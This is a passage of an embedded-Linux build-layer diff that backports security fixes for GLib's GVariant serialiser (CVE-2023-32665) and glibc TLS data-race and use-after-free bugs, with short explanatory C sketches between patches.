++ value.checked_offsets_up_to = G_MAXSIZE;
+
+ {
+ gsize fixed_size;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 144aec8..e132451 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -40,6 +40,15 @@ typedef struct
+ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
+ * rather than an index into the frame offsets. */
+ gsize ordered_offsets_up_to;
++
++ /* Similar to @ordered_offsets_up_to. This gives the index of the child element
++ * whose frame offset is the highest in the offset table which has been
++ * checked so far.
++ *
++ * This is always ≥ @ordered_offsets_up_to. It is always an element index.
++ *
++ * See documentation in gvariant-core.c for `struct GVariant` for details. */
++ gsize checked_offsets_up_to;
+ } GVariantSerialised;
+
+ /* deserialisation */
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index fdd36be..f910bd4 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+ serialised.size = g_variant_get_size (trusted);
+ serialised.data = g_malloc (serialised.size);
+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
++ serialised.checked_offsets_up_to = G_MAXSIZE;
+ g_variant_store (trusted, serialised.data);
+ g_variant_unref (trusted);
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index a84b02e..640f3c0 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1286,6 +1286,7 @@ random_instance_filler (GVariantSerialised *serialised,
+
+ serialised->depth = 0;
+ serialised->ordered_offsets_up_to = 0;
++ serialised->checked_offsets_up_to = 0;
+
+ g_assert_true (serialised->type_info == instance->type_info);
+ g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -1453,6 +1454,7 @@ test_maybe (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised,
+ random_instance_filler,
+@@ -1577,6 +1579,7 @@ test_array (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1742,6 +1745,7 @@ test_tuple (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1839,6 +1843,7 @@ test_variant (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) &instance, 1);
+--
+2.24.4
+
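Patch 0008's commit message describes two cursors: how far the offset table has been checked, and how far it is known to be in order. A compact way to see why both are needed is the hypothetical, GLib-free sketch below; with only the "ordered" cursor, every query past a bad entry would rescan from the same place, whereas the extra "checked" cursor makes those repeat queries O(1).

    #include <stddef.h>
    #include <stdio.h>

    typedef struct
    {
      const size_t *offsets;   /* the (possibly untrusted) offset table */
      size_t n_offsets;
      size_t ordered_up_to;    /* highest index known to be non-decreasing */
      size_t checked_up_to;    /* highest index that has been examined */
    } OffsetTable;             /* hypothetical, not a GLib type */

    /* Returns nonzero if entry @index (and everything before it) is usable.
     * Once a bad entry is found, checked_up_to runs ahead of ordered_up_to,
     * so later queries for higher indices return without rescanning. */
    static int
    offset_table_index_ok (OffsetTable *table, size_t index)
    {
      if (index >= table->n_offsets)
        return 0;

      if (index > table->checked_up_to &&
          table->ordered_up_to == table->checked_up_to)
        {
          size_t i = table->checked_up_to;

          while (i < index && table->offsets[i] <= table->offsets[i + 1])
            i++;

          table->ordered_up_to = i;
          table->checked_up_to = index;
        }

      return index <= table->ordered_up_to;
    }

    int
    main (void)
    {
      const size_t offs[] = { 2, 5, 4, 9 };   /* entry 2 is out of order */
      OffsetTable t = { offs, 4, 0, 0 };
      size_t i;

      for (i = 0; i < 4; i++)
        printf ("index %zu usable: %d\n", i, offset_table_index_ok (&t, i));

      return 0;
    }
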
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
new file mode 100644
index 0000000000..a523e60b91
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
@@ -0,0 +1,97 @@
+From 298a537d5f6783e55d87e40011ee3fd3b22b72f9 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:39:01 +0000
+Subject: [PATCH] gvariant: Zero-initialise various GVariantSerialised objects
+
+The following few commits will add a couple of new fields to
+`GVariantSerialised`, and they should be zero-filled by default.
+
+Try and pre-empt that a bit by zero-filling `GVariantSerialised` by
+default in a few places.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/298a537d5f6783e55d87e40011ee3fd3b22b72f9]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 2 +-
+ glib/tests/gvariant.c | 12 ++++++------
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index f910bd4..8ba701e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5936,7 +5936,7 @@ g_variant_byteswap (GVariant *value)
+ if (alignment)
+ /* (potentially) contains multi-byte numeric data */
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariant *trusted;
+ GBytes *bytes;
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 640f3c0..d640c81 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1446,7 +1446,7 @@ test_maybe (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariantSerialised child;
+
+ serialised.type_info = type_info;
+@@ -1572,7 +1572,7 @@ test_array (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+
+ serialised.type_info = array_info;
+ serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1738,7 +1738,7 @@ test_tuple (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+
+ serialised.type_info = type_info;
+ serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1835,7 +1835,7 @@ test_variant (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariantSerialised child;
+
+ serialised.type_info = type_info;
+@@ -2284,7 +2284,7 @@ serialise_tree (TreeInstance *tree,
+ static void
+ test_byteswap (void)
+ {
+- GVariantSerialised one, two;
++ GVariantSerialised one = { 0, }, two = { 0, };
+ TreeInstance *tree;
+
+ tree = tree_instance_new (NULL, 3);
+@@ -2358,7 +2358,7 @@ test_serialiser_children (void)
+ static void
+ test_fuzz (gdouble *fuzziness)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ TreeInstance *tree;
+
+ /* make an instance */
+--
+2.24.4
+
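Patch 0009 is preparation: once every stack-allocated GVariantSerialised is brace-initialised, the offset-tracking fields added by the neighbouring patches start out as zero without touching every call site. The behaviour relied on is plain C, as this small hypothetical example shows; a { 0, } initialiser zero-fills all members, including any appended to the struct later.

    #include <stddef.h>
    #include <stdio.h>

    /* Stand-in for GVariantSerialised; the last field is the "new" one. */
    typedef struct
    {
      const void *data;
      size_t size;
      size_t depth;
      size_t ordered_offsets_up_to;
      size_t checked_offsets_up_to;
    } Serialised;

    int
    main (void)
    {
      Serialised s = { 0, };   /* every member starts at zero/NULL */

      printf ("%zu %zu\n", s.ordered_offsets_up_to, s.checked_offsets_up_to);
      return 0;
    }
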
diff --git a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
index 09d253fbfb..60a6b843c1 100644
--- a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
+++ b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
@@ -17,6 +17,45 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \
file://0001-meson-Run-atomics-test-on-clang-as-well.patch \
file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \
file://tzdata-update.patch \
+ file://CVE-2020-35457.patch \
+ file://CVE-2021-27218.patch \
+ file://CVE-2021-27219-01.patch \
+ file://CVE-2021-27219-02.patch \
+ file://CVE-2021-27219-03.patch \
+ file://CVE-2021-27219-04.patch \
+ file://CVE-2021-27219-05.patch \
+ file://CVE-2021-27219-06.patch \
+ file://CVE-2021-27219-07.patch \
+ file://CVE-2021-27219-08.patch \
+ file://CVE-2021-27219-09.patch \
+ file://CVE-2021-27219-10.patch \
+ file://CVE-2021-27219-11.patch \
+ file://CVE-2021-27219-reg1-1.patch \
+ file://CVE-2021-27219-reg1-2.patch \
+ file://CVE-2021-27219-reg1-4.patch \
+ file://CVE-2021-27219-reg1-5.patch \
+ file://CVE-2021-27219-reg2-1.patch \
+ file://CVE-2021-27219-reg2-2.patch \
+ file://CVE-2021-27219-reg2-3.patch \
+ file://CVE-2021-28153-1.patch \
+ file://CVE-2021-28153-2.patch \
+ file://CVE-2021-28153-3.patch \
+ file://CVE-2021-28153-4.patch \
+ file://CVE-2021-28153-5.patch \
+ file://CVE-2023-32665-0001.patch \
+ file://CVE-2023-32665-0002.patch \
+ file://CVE-2023-32665-0003.patch \
+ file://CVE-2023-32665-0004.patch \
+ file://CVE-2023-32665-0005.patch \
+ file://CVE-2023-32665-0006.patch \
+ file://CVE-2023-32665-0007.patch \
+ file://CVE-2023-32665-0008.patch \
+ file://CVE-2023-32665-0009.patch \
+ file://CVE-2023-29499.patch \
+ file://CVE-2023-32611-0001.patch \
+ file://CVE-2023-32611-0002.patch \
+ file://CVE-2023-32643.patch \
+ file://CVE-2023-32636.patch \
"
SRC_URI_append_class-native = " file://relocate-modules.patch"
diff --git a/meta/recipes-core/glib-2.0/glib.inc b/meta/recipes-core/glib-2.0/glib.inc
index 7ebed0e5fd..1849a6e05c 100644
--- a/meta/recipes-core/glib-2.0/glib.inc
+++ b/meta/recipes-core/glib-2.0/glib.inc
@@ -4,7 +4,7 @@ HOMEPAGE = "https://developer.gnome.org/glib/"
# pcre is under BSD;
# docs/reference/COPYING is with a 'public domain'-like license!
-LICENSE = "LGPLv2.1+ & BSD & PD"
+LICENSE = "LGPLv2.1+ & BSD-3-Clause & PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
file://glib/glib.h;beginline=4;endline=17;md5=b88abb7f3ad09607e71cb9d530155906 \
file://gmodule/COPYING;md5=4fbd65380cdd255951079008b364516c \
@@ -32,10 +32,6 @@ inherit meson gettext gtk-doc pkgconfig ptest-gnome upstream-version-is-even bas
GTKDOC_MESON_OPTION = "gtk_doc"
-# This avoids the need to depend on target python3, which in case of mingw is not even possible.
-# meson's python configuration pokes into python3 configuration, so this provides the native config to it.
-unset _PYTHON_SYSCONFIGDATA_NAME
-
S = "${WORKDIR}/glib-${PV}"
PACKAGECONFIG ??= "system-pcre libmount \
diff --git a/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb b/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
index b74532087c..c476a7cba5 100644
--- a/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
+++ b/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
@@ -31,4 +31,4 @@ FILES_${PN} += "\
FILES_${PN}-dev += "${libdir}/gio/modules/libgio*.la"
FILES_${PN}-staticdev += "${libdir}/gio/modules/libgio*.a"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
index 24de55d929..9aa24eccfe 100644
--- a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
+++ b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
@@ -20,7 +20,7 @@ inherit autotools
FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:"
SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
- git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \
+ git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \
\
file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \
\
diff --git a/meta/recipes-core/glibc/glibc-version.inc b/meta/recipes-core/glibc/glibc-version.inc
index 3bcd336de4..95e2bba301 100644
--- a/meta/recipes-core/glibc/glibc-version.inc
+++ b/meta/recipes-core/glibc/glibc-version.inc
@@ -1,6 +1,6 @@
SRCBRANCH ?= "release/2.31/master"
PV = "2.31+git${SRCPV}"
-SRCREV_glibc ?= "6fdf971c9dbf7dac9bea552113fe4694015bbc4d"
+SRCREV_glibc ?= "2d4f26e5cfda682f9ce61444b81533b83f6381af"
SRCREV_localedef ?= "cd9f958c4c94a638fa7b2b4e21627364f1a1a655"
GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git"
diff --git a/meta/recipes-core/glibc/glibc.inc b/meta/recipes-core/glibc/glibc.inc
index 23a6ca99ae..e42040f3dc 100644
--- a/meta/recipes-core/glibc/glibc.inc
+++ b/meta/recipes-core/glibc/glibc.inc
@@ -1,7 +1,9 @@
require glibc-common.inc
require glibc-ld.inc
-DEPENDS = "virtual/${TARGET_PREFIX}gcc libgcc-initial linux-libc-headers"
+DEPENDS = "virtual/${TARGET_PREFIX}gcc virtual/${TARGET_PREFIX}binutils${BUSUFFIX} libgcc-initial linux-libc-headers"
+BUSUFFIX= ""
+BUSUFFIX:class-nativesdk = "-crosssdk"
PROVIDES = "virtual/libc"
PROVIDES += "virtual/libintl virtual/libiconv"
diff --git a/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
new file mode 100644
index 0000000000..dba491f4dc
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
@@ -0,0 +1,66 @@
+From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 21:52:38 +0000
+Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free
+
+map is not valid to access here because it can be freed by a concurrent
+dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is
+called without holding dlopen locks. So don't check the modid of map.
+
+The map == 0 and map != 0 code paths can be shared (avoiding the dtv
+resize in case of map == 0 is just an optimization: larger dtv than
+necessary would be fine too).
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-tls.c | 21 +++++----------------
+ 1 file changed, 5 insertions(+), 16 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 24d00c14ef..f8b32b3ecb 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ {
+ for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt)
+ {
++ size_t modid = total + cnt;
++
+ size_t gen = listp->slotinfo[cnt].gen;
+
+ if (gen > new_gen)
+@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid)
+
+ /* If there is no map this means the entry is empty. */
+ struct link_map *map = listp->slotinfo[cnt].map;
+- if (map == NULL)
+- {
+- if (dtv[-1].counter >= total + cnt)
+- {
+- /* If this modid was used at some point the memory
+- might still be allocated. */
+- free (dtv[total + cnt].pointer.to_free);
+- dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED;
+- dtv[total + cnt].pointer.to_free = NULL;
+- }
+-
+- continue;
+- }
+-
+ /* Check whether the current dtv array is large enough. */
+- size_t modid = map->l_tls_modid;
+- assert (total + cnt == modid);
+ if (dtv[-1].counter < modid)
+ {
++ if (map == NULL)
++ continue;
++
+ /* Resize the dtv. */
+ dtv = _dl_resize_dtv (dtv);
+
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
new file mode 100644
index 0000000000..25beee1d50
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
@@ -0,0 +1,191 @@
+From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 19:19:37 +0000
+Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ
+ #19329]
+
+DTV setup at thread creation (_dl_allocate_tls_init) is changed
+to take the dlopen lock, GL(dl_load_lock). Avoiding data races
+here without locks would require design changes: the map that is
+accessed for static TLS initialization here may be concurrently
+freed by dlclose. That use after free may be solved by only
+locking around static TLS setup or by ensuring dlclose does not
+free modules with static TLS, however currently every link map
+with TLS has to be accessed at least to see if it needs static
+TLS. And even if that's solved, still a lot of atomics would be
+needed to synchronize DTV related globals without a lock. So fix
+both bug 19329 and bug 27111 with a lock that prevents DTV setup
+running concurrently with dlopen or dlclose.
+
+_dl_update_slotinfo at TLS access still does not use any locks
+so CONCURRENCY NOTES are added to explain the synchronization.
+The early exit from the slotinfo walk when max_modid is reached
+is not strictly necessary, but does not hurt either.
+
+An incorrect acquire load was removed from _dl_resize_dtv: it
+did not synchronize with any release store or fence and
+synchronization is now handled separately at thread creation
+and TLS access time.
+
+There are still a number of racy read accesses to globals that
+will be changed to relaxed MO atomics in a followup patch. This
+should not introduce regressions compared to existing behaviour
+and avoid cluttering the main part of the fix.
+
+Not all TLS access related data races got fixed here: there are
+additional races at lazy tlsdesc relocations see bug 27137.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 47 insertions(+), 16 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 6baff0c1ea..94f3cdbae0 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[];
+ #endif
+
+ static dtv_t *
+-_dl_resize_dtv (dtv_t *dtv)
++_dl_resize_dtv (dtv_t *dtv, size_t max_modid)
+ {
+ /* Resize the dtv. */
+ dtv_t *newp;
+- /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by
+- other threads concurrently. */
+- size_t newsize
+- = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS;
++ size_t newsize = max_modid + DTV_SURPLUS;
+ size_t oldsize = dtv[-1].counter;
+
+ if (dtv == GL(dl_initial_dtv))
+@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result)
+ size_t total = 0;
+ size_t maxgen = 0;
+
++ /* Protects global dynamic TLS related state. */
++ __rtld_lock_lock_recursive (GL(dl_load_lock));
++
+ /* Check if the current dtv is big enough. */
+ if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
+ {
+ /* Resize the dtv. */
+- dtv = _dl_resize_dtv (dtv);
++ dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx));
+
+ /* Install this new dtv in the thread data structures. */
+ INSTALL_DTV (result, &dtv[-1]);
+@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result)
+ listp = listp->next;
+ assert (listp != NULL);
+ }
++ __rtld_lock_unlock_recursive (GL(dl_load_lock));
+
+ /* The DTV version is up-to-date now. */
+ dtv[0].counter = maxgen;
+@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid)
+
+ if (dtv[0].counter < listp->slotinfo[idx].gen)
+ {
+- /* The generation counter for the slot is higher than what the
+- current dtv implements. We have to update the whole dtv but
+- only those entries with a generation counter <= the one for
+- the entry we need. */
++ /* CONCURRENCY NOTES:
++
++ Here the dtv needs to be updated to new_gen generation count.
++
++ This code may be called during TLS access when GL(dl_load_lock)
++ is not held. In that case the user code has to synchronize with
++ dlopen and dlclose calls of relevant modules. A module m is
++ relevant if the generation of m <= new_gen and dlclose of m is
++ synchronized: a memory access here happens after the dlopen and
++ before the dlclose of relevant modules. The dtv entries for
++ relevant modules need to be updated, other entries can be
++ arbitrary.
++
++ This e.g. means that the first part of the slotinfo list can be
++ accessed race free, but the tail may be concurrently extended.
++ Similarly relevant slotinfo entries can be read race free, but
++ other entries are racy. However updating a non-relevant dtv
++ entry does not affect correctness. For a relevant module m,
++ max_modid >= modid of m. */
+ size_t new_gen = listp->slotinfo[idx].gen;
+ size_t total = 0;
++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
++ assert (max_modid >= req_modid);
+
+ /* We have to look through the entire dtv slotinfo list. */
+ listp = GL(dl_tls_dtv_slotinfo_list);
+@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ {
+ size_t modid = total + cnt;
+
++ /* Later entries are not relevant. */
++ if (modid > max_modid)
++ break;
++
+ size_t gen = listp->slotinfo[cnt].gen;
+
+ if (gen > new_gen)
+- /* This is a slot for a generation younger than the
+- one we are handling now. It might be incompletely
+- set up so ignore it. */
++ /* Not relevant. */
+ continue;
+
+ /* If the entry is older than the current dtv layout we
+@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ continue;
+
+ /* Resize the dtv. */
+- dtv = _dl_resize_dtv (dtv);
++ dtv = _dl_resize_dtv (dtv, max_modid);
+
+ assert (modid <= dtv[-1].counter);
+
+@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ }
+
+ total += listp->len;
++ if (total > max_modid)
++ break;
++
++ /* Synchronize with _dl_add_to_slotinfo. Ideally this would
++ be consume MO since we only need to order the accesses to
++ the next node after the read of the address and on most
++ hardware (other than alpha) a normal load would do that
++ because of the address dependency. */
++ listp = atomic_load_acquire (&listp->next);
+ }
+- while ((listp = listp->next) != NULL);
++ while (listp != NULL);
+
+ /* This will be the new maximum generation counter. */
+ dtv[0].counter = new_gen;
+@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add)
+ the first slot. */
+ assert (idx == 0);
+
+- listp = prevp->next = (struct dtv_slotinfo_list *)
++ listp = (struct dtv_slotinfo_list *)
+ malloc (sizeof (struct dtv_slotinfo_list)
+ + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
+ if (listp == NULL)
+@@ -1000,6 +1029,8 @@ cannot create TLS data structures"));
+ listp->next = NULL;
+ memset (listp->slotinfo, '\0',
+ TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
++ /* Synchronize with _dl_update_slotinfo. */
++ atomic_store_release (&prevp->next, listp);
+ }
+
+ /* Add the information into the slotinfo data structure. */
+--
+2.27.0
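
The CONCURRENCY NOTES added above boil down to a publish/subscribe pattern: the writer fully initialises a new slotinfo block and only then makes it reachable with a release store, while lock-free readers follow the next pointers with acquire loads. The glibc patch uses its internal atomic macros; the sketch below expresses the same pattern with standard C11 <stdatomic.h> and hypothetical names, and is not the glibc code itself.

    #include <stdatomic.h>
    #include <stddef.h>
    #include <stdio.h>
    #include <stdlib.h>

    /* Append-only singly linked list; readers may walk it without a lock. */
    struct node
    {
      int payload;
      struct node *_Atomic next;
    };

    /* Writer side (in glibc, run under the dlopen lock): initialise the
     * node completely, then publish it with a release store so readers
     * that observe the pointer also observe the initialised contents. */
    static int
    append (struct node *tail, int payload)
    {
      struct node *n = calloc (1, sizeof *n);

      if (n == NULL)
        return -1;

      n->payload = payload;
      atomic_init (&n->next, NULL);
      atomic_store_explicit (&tail->next, n, memory_order_release);
      return 0;
    }

    /* Reader side (may run without the lock): acquire loads pair with the
     * release store above, so every node reached is fully initialised. */
    static int
    sum (struct node *head)
    {
      int total = 0;
      struct node *p;

      for (p = head; p != NULL;
           p = atomic_load_explicit (&p->next, memory_order_acquire))
        total += p->payload;

      return total;
    }

    int
    main (void)
    {
      struct node head = { 0 };

      /* Single-threaded demo; in glibc the appends happen under
       * GL(dl_load_lock) while TLS-access readers run concurrently. */
      append (&head, 3);
      append (atomic_load_explicit (&head.next, memory_order_acquire), 4);

      printf ("sum = %d\n", sum (&head));
      return 0;
    }
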
diff --git a/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
new file mode 100644
index 0000000000..eb8ef3161c
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
@@ -0,0 +1,206 @@
+From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 19:19:37 +0000
+Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329]
+
+This is a follow up patch to the fix for bug 19329. This adds relaxed
+MO atomics to accesses that were previously data races but are now
+race conditions, and where relaxed MO is sufficient.
+
+The race conditions all follow the pattern that the write is behind the
+dlopen lock, but a read can happen concurrently (e.g. during tls access)
+without holding the lock. For slotinfo entries the read value only
+matters if it reads from a synchronized write in dlopen or dlclose,
+otherwise the related dtv entry is not valid to access so it is fine
+to leave it in an inconsistent state. The same applies for
+GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the
+algorithm relies on the fact that the read of the last synchronized
+write is an increasing value.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-close.c | 20 +++++++++++++-------
+ elf/dl-open.c | 5 ++++-
+ elf/dl-tls.c | 31 +++++++++++++++++++++++--------
+ sysdeps/x86_64/dl-tls.c | 3 ++-
+ 4 files changed, 42 insertions(+), 17 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9]
+Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index c51becd06b..3720e47dd1 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ {
+ assert (old_map->l_tls_modid == idx);
+
+- /* Mark the entry as unused. */
+- listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1;
+- listp->slotinfo[idx - disp].map = NULL;
++ /* Mark the entry as unused. These can be read concurrently. */
++ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
++ GL(dl_tls_generation) + 1);
++ atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL);
+ }
+
+ /* If this is not the last currently used entry no need to look
+@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+
+ if (listp->slotinfo[idx - disp].map != NULL)
+ {
+- /* Found a new last used index. */
+- GL(dl_tls_max_dtv_idx) = idx;
++ /* Found a new last used index. This can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx);
+ return true;
+ }
+ }
+@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force)
+ GL(dl_tls_dtv_slotinfo_list), 0,
+ imap->l_init_called))
+ /* All dynamically loaded modules with TLS are unloaded. */
+- GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem);
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx),
++ GL(dl_tls_static_nelem));
+
+ if (imap->l_tls_offset != NO_TLS_OFFSET
+ && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET)
